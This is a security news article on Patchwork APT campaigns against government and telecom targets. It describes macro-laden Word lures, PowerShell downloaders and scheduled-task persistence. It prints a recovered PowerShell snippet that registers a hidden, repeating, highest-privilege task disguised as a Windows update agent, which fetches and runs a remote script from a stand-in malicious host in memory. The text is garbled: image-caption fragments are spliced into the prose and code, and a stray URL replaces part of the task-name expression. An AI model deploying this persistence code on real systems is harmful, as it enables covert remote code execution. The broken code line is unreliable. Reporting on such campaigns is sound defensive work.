Since mid-2025, cybersecurity researchers have tracked a resurgence of Patchwork Advanced Persistent Threat (APT) campaigns targeting government and telecommunications sectors across Asia and Eastern Europe.
Initially leveraging spear-phishing emails containing malicious Office document attachments, this latest wave of activity has evolved into a multi-stage infection chain employing sophisticated persistence and payload retrieval tactics.
The initial intrusion typically begins when an unsuspecting user enables macros in a weaponized Word document, triggering an embedded PowerShell script that silently reaches out to a command-and-control server.
From there, Patchwork’s operators establish a foothold, harvest credentials, and maintain long-term access within compromised networks.
In recent weeks, K7 Security Labs analysts noted that the PowerShell component responsible for persistence had been enhanced with dynamic URL generation and randomized scheduled task names to evade detection by endpoint monitoring solutions.
Analysts identified a shift from static command URLs to a multi-URL failover mechanism, ensuring that if one download source is blocked, subsequent attempts still succeed.
This refinement underscores the group’s focus on defeating conventional network-based detection controls by distributing payload hosting across multiple compromised web servers.
The impact of these operations has ranged from credential theft to the deployment of custom remote access tools, enabling lateral movement and data exfiltration.
Victims report CPU spikes and anomalous outbound HTTP requests occurring at regular intervals, indicative of scheduled task execution.
.webp "Patchwork APT Using PowerShell Commands to Create Scheduled Task and Downloads Final Payload 3")
In several instances, the operators have deployed a final payload that leverages legitimate Windows binaries to load malicious DLLs into memory, complicating forensic analysis.
The observed payloads vary from password-dumping utilities to bespoke C2 frameworks capable of executing arbitrary commands and staging additional modules on demand.
Infection Mechanism via Scheduled Tasks
A deep dive into Patchwork’s infection mechanism reveals how it leverages native Windows utilities to orchestrate its payload execution.
Upon execution of the initial PowerShell downloader, the malware generates a unique task name, often resembling standard Windows maintenance services.
The following PowerShell snippet, recovered from an incident response log, illustrates the core of this persistence tactic:-
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30) -RepetitionDuration ([TimeSpan]::MaxValue)
$action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-NoProfile -WindowStyle Hidden -Command `"IEX ((New-Object Net.WebClient).DownloadString('http://malicious.server/update.ps1'))`""
Register-ScheduledTask -TaskName "WindowsUpdateAgent-$(https://cybersecuritynews.com/?p=128525::NewGuid().ToString())" -Trigger $trigger -Action $action -RunLevel Highest.webp "Patchwork APT Using PowerShell Commands to Create Scheduled Task and Downloads Final Payload 4")
This scheduled task runs silently at frequent intervals, downloading and executing the final payload without writing files to disk.
The use of Invoke-Expression (IEX) combined with New-Object Net.WebClient allows the malware to stream scripts directly into memory, bypassing file-based detection.
Once the secondary payload is loaded, the operators gain full interactive access via a custom backdoor, enabling credential harvesting and lateral movement.
By abusing legitimate Windows task scheduling and networking APIs, Patchwork APT successfully blends into normal system activity, posing significant challenges for defenders attempting to differentiate malicious behavior from routine maintenance operations.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
